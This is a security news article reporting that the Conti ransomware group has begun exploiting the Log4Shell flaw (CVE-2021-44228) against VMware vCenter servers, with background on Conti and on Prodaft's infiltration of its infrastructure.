Conti has become the first major ransomware group to incorporate the Log4Shell vulnerability (CVE-2021-44228) in their operation. According to a new report from Advanced Intelligence, since December 13, the group has been seen targeting vulnerable VMware vCenter servers using the publicly available exploit for CVE-2021-44228 in order to gain access to enterprise networks.

“On December 12, through deep visibility into adversarial collections, AdvIntel discovered that multiple Conti group members expressed interest in the exploitation of the vulnerability for the initial attack vector resulting in the scanning activity leveraging the publicly available Log4J2 exploit. This is the first time this vulnerability entered the radar of a major ransomware group,” the researchers said.

“It is only a matter of time until Conti and possibly other groups will begin exploiting Log4j2 to its full capacity. It is recommended to patch the vulnerable system immediately and view the Log4j2 as a ransomware group exploitation vector,” they warned.

CVE-2021-44228 affects Log4j, a Java library for logging error messages in applications. It is a remote code injection vulnerability, which exists due to improper input validation when processing LDAP requests and could be abused by threat actors to hijack servers and apps over the internet. The disclosure of the flaw caused a widespread alarm because Log4j is widely used in commonly deployed enterprise systems.

The Dutch National Cyber Security Center released a lengthy list of software affected by CVE-2021-44228.

Conti is a sophisticated Ransomware-as-a-Service (RaaS) model first detected in December 2019. In typical Conti ransomware attacks, malicious actors steal files, encrypt servers and workstations, and demand a ransom payment. In September, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI), said they had observed the Conti ransomware being used in more than 400 attacks, mainly in North America and Europe.

Last month, researchers from the cybersecurity firm Prodaft exposed the real IP address of one of the servers hosting the payment portal used by the Conti ransomware group to conduct negotiations with victims. The researchers were able to obtain insider data on the Conti RaaS group and its platform, including information on its management panel and access the console for more than a month. They gained access to the gang’s recovery service and an admin management panel hosted as a TOR hidden service and located the the subject management panel mainly used for managing victims, affiliate accounts, and uploaded files.